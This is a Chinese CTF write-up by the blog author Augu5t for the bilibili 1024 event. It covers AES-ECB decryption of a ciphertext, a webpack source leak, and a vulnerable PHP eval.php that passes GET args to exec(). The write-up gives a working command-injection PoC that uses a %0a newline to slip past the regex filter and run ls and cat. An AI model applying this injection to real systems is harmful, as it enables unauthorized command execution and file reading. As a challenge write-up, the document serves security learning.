bilibili1024CTF


1024程序员节,大家一起和2233参与解密游戏吧~

happy_1024_2233:
e9ca6f21583a1533d3ff4fd47ddc463c6a1c7d2cf084d364
0408abca7deabb96a58f50471171b60e02b1a8dbd32db156

48位密文/96位密文️,猜测是AES解密,密钥为happy_1024_2233,无偏移ECB模式解密输出hex得到flag。

webpack

webpack打包不严造成的home.vue信息泄漏

eval.php

<?php
    /* 
        bilibili- ( ゜- ゜)つロ 乾杯~
        uat: http://192.168.3.2/uat/eval.php
        pro: http://security.bilibili.com/sec1024/q/pro/eval.php
    */
    $args = @$_GET['args'];
    if (count($args) >3) {
        exit();
    }
    for ( $i=0; $i<count($args); $i++ ){
        if ( !preg_match('/^\w+$/', $args[$i]) ) {
            exit();
        }
    }
    // todo: other filter
    $cmd = "/bin/2233 " . implode(" ", $args);
    exec($cmd, $out);
    for ($i=0; $i<count($out); $i++){
        echo($out[$i]);
        echo('<br>');
    }
?>

分析代码,思路:传递args参数,需要命中正则/^\w+$/ 进入exec()。
构造poc:args[]=cat%0a&args[]=ls
返回以下信息:

1.txt
passwd
data
config

用cat读取passwd发现flag
eval.php?args[]=cat%0a&args[]=cat&&args[]=passwd


文章作者: Augu5t
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Augu5t !
  目录